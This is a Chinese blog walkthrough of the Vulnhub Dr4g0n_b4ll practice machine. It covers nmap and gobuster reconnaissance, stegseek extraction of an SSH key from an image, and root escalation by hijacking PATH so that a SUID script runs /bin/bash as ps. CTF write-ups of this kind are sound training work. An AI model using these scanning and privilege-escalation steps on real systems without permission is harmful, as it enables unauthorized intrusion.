首页 > 其他分享 >【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

时间:2024-07-31 12:58:41浏览次数:15  
标签:exe b4ll nmap 31.65 Dr4g0n 192.168 Vulnhub txt

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

image-20240224152423286

配置名称和路径

image-20240224152402352

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

image-20240224135014762

2、端口扫描

1、快速粗略的端口扫描

nmap.exe -F 192.168.31.65
image-20240224135148134

2、详细端口扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

image-20240224135658689

3、详细扫描和漏洞探测

nmap.exe -sV -A -p22,80 192.168.31.65

image-20240224135440463

nmap.exe --script=vuln -p22,80 192.168.31.65

image-20240224135500772

只发现了一个robots.txt 的文件

3、web 目录探测

gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

image-20240224140201673

4、web 框架探测

whatweb http://192.168.31.65

image-20240224140522211

三、获取shell立足点

1、查看敏感信息

1、主页

image-20240224140723028

2、robots.txt 文件

image-20240224140817155

进行base64解码:

image-20240224140957715

3、源代码

image-20240224141117019

image-20240224141448789

2、DRAGON BALL目录信息

image-20240224142227549

1、secret.txt 文件

image-20240224142428287

保存下来做目录爆破

image-20240224143723348

并无收获

2、Vulnhub 目录

image-20240224143748924

3、Vulnhub/login.html:是一个虚假的登录页面

image-20240224143820482

4、aj.jpg:一张黑客的图片

image-20240224144139876

3、图片信息提取

提取图片隐写信息

stegseek aj.jpg /usr/share/wordlists/rockyou.txt
image-20240224150532499

image-20240224150607293

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

image-20240224150858190

我们直接用密钥进行登录

ssh [email protected] -i id_rsa

image-20240224150946067

成功拿到shell

四、提权至root

1、查看敏感文件

image-20240224151439588

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

image-20240224151818159

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

标签:exe,b4ll,nmap,31.65,Dr4g0n,192.168,Vulnhub,txt
From: https://blog.csdn.net/weixin_70142722/article/details/140819775

相关文章

  • 【Vulnhub靶机之Hackme】
     第一步:打开靶机 第二步:查看虚拟靶机ip、第三步:查看连接80端口的ip第四步:扫描出靶机的ip地址第五步:扫描靶机地址下的目录访问login.php目录点击注册点击,可以看到许多的书名 第六步:使用burpsuite抓包在111后面加*号保存抓到的文件为post.txt第七步:使用......
  • 【Vulnhub靶场AI-WEB-1.0打靶教程】
     第一步:查看虚拟机的ip第二步:扫描ip下开放的80端口第三步:扫描查到的ip地址下的目录第四步:访问查到的目录访问robot.txt第五步:访问robot.txt显示出的目录第六步:打开kali终端,使用sqlmap功能sqlmap-u"http://192.168.189.153/se3reTdir777/index.php"-data"uid=......
  • 【Vulnhub靶机tomato渗透】
    第一步:端口扫描我使用的是webrobot访问这个ip,就是它了 第二步:目录扫描打开kali使用dirb命令扫描http://192.168.189.154下的目录dirbhttp://192.168.189.154扫描到目录。第三步:访问目录地址看到有几个php的文件第四步:查看访问php的文件我查看的antibot.php是......
  • 【Vulnhub系列】Vulnhub_SecureCode1靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_SecureCode1靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境配置1、从百度网盘下载对应靶机的.ova镜像2、在VM中选择【打开】该.ova3、选择存储路径,并打开4、之后确认网络连接模式是......
  • 【Vulnhub系列】Vulnhub_DC-1靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境准备1、在百度网盘中下载DC-1靶场。DC-1靶场受virtualbox的影响,在VM中直接打开是扫描不到IP的,我们需要先解决这个问题:【其他经验】V......
  • Vulnhub-Empire Breakout
    简介名称:Vulnhub-Empire:Breakout发布日期:2021年10月21日难度:容易描述:这个盒子被创建为一个简单盒子,但如果你迷路了,它可以是中等的。下载地址:https://www.vulnhub.com/entry/empire-breakout,751/kali攻击机ip:192.168.1.4靶机地址:192.168.1.33渗透流程信息收集a......
  • vulnhub DC-7
    探测局域网内存活主机nmap-sP192.168.19.128/24发现存活主机192.168.19.134,扫描其开放端口nmap-p-192.168.19.134结果如下22/tcpopenssh80/tcpopenhttp访问80端口渗透现用whatweb扫描看一下是什么whatweb-v192.168.19.134发现使用的是Drupal开源CMS框......
  • VulnHub:cengbox1
    靶机下载地址,下载完成后,用VirtualBox打开靶机并修改网络为桥接即可搭建成功。信息收集主机发现和端口扫描扫描攻击机(192.168.31.218)同网段存活主机确认目标机ip,并对目标机进行全面扫描。nmap192.168.31.0/24-Pn-T4nmap目标主机ip-A-p--T4确认目标机ip为192.168.31......
  • 『vulnhub系列』FUNBOX LUNCHBREAKER
    『vulnhub系列』FUNBOX:LUNCHBREAKER下载地址:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/信息搜集:寻找内网存活主机nmap192.168.199.*访问80端口,只发现一张图片进行目录爆破,发现/robots.txtdirsearch-u"http://192.168.199.134/"访问/robots.txt......
  • vulnhub DC-5
    信息搜集扫描局域网存活主机nmap-sP192.168.19.128/24发现存在主机192.168.19.132,接下来探测开放端口nmap-p-192.168.19.132发现存在如下三个开放端口80/tcpopenhttp111/tcpopenrpcbind50742/tcpopenunknown这里简单的了解一下什么是rpc和rpcbind.......